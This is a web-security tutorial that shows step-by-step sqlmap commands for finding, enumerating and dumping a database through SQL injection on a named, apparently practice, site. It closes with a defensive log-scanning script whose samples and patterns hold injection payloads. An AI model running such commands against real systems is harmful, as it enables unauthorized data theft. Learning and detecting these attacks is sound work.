Web6: SQL Injection - Some Exploit Tools

Many security scanning tools are available today, including tools for SQL injection. These tools are quite powerful at detecting and exploiting SQL injection vulnerabilities. Some commonly used automated SQL injection exploit tools include:

  1. Sqlmap
  2. The Mole (Digging up your data)
  3. Havij

Other tools you can look at include Netsparker, jSQL Injection, Burp, and BBQSQL.

Below is a demo of using Sqlmap to exploit a basic SQL injection.

You can download Sqlmap here.

Sqlmap is written in Python, so you need to install Python to use it. You can download Python at http://www.python.org/downloads/

First, define the target website. Here my target is: http://zerocoolhf.altervista.org/level1.php?id=1 (this page is now dead).

Step 1: Open cmd and type the following command:

python sqlmap.py -u "http://zerocoolhf.altervista.org/level1.php?id=1"

sqlmap detects the target's vulnerability and reports information about it.

Step 2: Once it has been determined that the target website has an SQL injection vulnerability, we proceed to find the database name.

python sqlmap.py -u "http://zerocoolhf.altervista.org/level1.php?id=1" --dbs

=> Database: my_zerocoolhf

Step 3: After determining the database name, we find the names of the tables in the database.

python sqlmap.py -u "http://zerocoolhf.altervista.org/level1.php?id=1" --tables -D my_zerocoolhf

=> There are 2 tables in the database: auth and book

Step 4: Identify the column names in the table.

python sqlmap.py -u "http://zerocoolhf.altervista.org/level1.php?id=1" --columns -D my_zerocoolhf -T book

=> The columns in the book table are: author, id, price, title.

Step 5: Dump data from the table.

python sqlmap.py -u "http://zerocoolhf.altervista.org/level1.php?id=1" --dump -D my_zerocoolhf -T book

=> Thus, we have obtained the database of the target website.

Above is a basic demo of using sqlmap to exploit SQL injection vulnerabilities. You can learn more about sqlmap's options here to support SQL injection exploitation.
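Seen from the server side, the steps above leave recognizable traces in the web access log. The following is an added example, not code from the original article or from the sqlmap project: it scans constructed log lines for sqlmap's default User-Agent and for the metadata queries behind --dbs, --tables and --columns. It assumes combined log format, GET parameters, and a MySQL-style information_schema; the rule names and the scan function are hypothetical.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample access log (documentation IP ranges); not from the original page.
SAMPLE_LOG = '''\
198.51.100.7 - - [01/Jan/2024:10:00:00 +0000] "GET /level1.php?id=1 HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.9 - - [01/Jan/2024:10:00:05 +0000] "GET /level1.php?id=1%20AND%204821%3D4821 HTTP/1.1" 200 512 "-" "sqlmap/1.7#stable (https://sqlmap.org)"
203.0.113.9 - - [01/Jan/2024:10:00:09 +0000] "GET /level1.php?id=-1%20UNION%20ALL%20SELECT%20schema_name%20FROM%20INFORMATION_SCHEMA.SCHEMATA HTTP/1.1" 200 733 "-" "Mozilla/5.0"
203.0.113.9 - - [01/Jan/2024:10:00:12 +0000] "GET /level1.php?id=1%2520UNION%2520SELECT%2520table_name%2520FROM%2520information_schema.tables HTTP/1.1" 200 801 "-" "Mozilla/5.0"
198.51.100.7 - - [01/Jan/2024:10:00:20 +0000] "GET /search.php?q=union+station HTTP/1.1" 200 420 "-" "Mozilla/5.0"
'''

# Combined log format: ip, request line, status, size, referer, user agent.
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (?P<uri>\S+) [^"]*" '
    r'\d{3} \S+ "[^"]*" "(?P<ua>[^"]*)"$')

# Heuristic rules (assumptions of this example): (name, field to inspect, pattern).
# The enumerate-* rules map to Steps 2, 3 and 4 on a MySQL-style backend.
RULES = [
    ("sqlmap-user-agent", "ua", re.compile(r"\bsqlmap/", re.I)),
    ("enumerate-databases", "query", re.compile(r"information_schema\.schemata", re.I)),
    ("enumerate-tables", "query", re.compile(r"information_schema\.tables", re.I)),
    ("enumerate-columns", "query", re.compile(r"information_schema\.columns", re.I)),
    ("union-select", "query", re.compile(r"\bunion\s+(all\s+)?select\b", re.I)),
    ("boolean-probe", "query", re.compile(r"\b(and|or)\s+(\d+)\s*=\s*\2\b", re.I)),
]

def scan(log_text):
    """Return {client_ip: sorted rule names hit} for suspicious requests."""
    hits = {}
    for line in log_text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue  # unparseable line: skip rather than guess
        # Decode twice so a double URL-encoded payload is still inspected.
        query = unquote_plus(unquote_plus(m.group("uri").partition("?")[2]))
        fields = {"ua": m.group("ua"), "query": query}
        for name, field, rx in RULES:
            if rx.search(fields[field]):
                hits.setdefault(m.group("ip"), set()).add(name)
    return {ip: sorted(names) for ip, names in hits.items()}

if __name__ == "__main__":
    for ip, names in scan(SAMPLE_LOG).items():
        print(ip, names)
```

The User-Agent rule only catches default settings, so the query-content rules carry most of the weight. Parameters sent in POST bodies do not appear in access logs and need inspection at the application or WAF layer.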

 
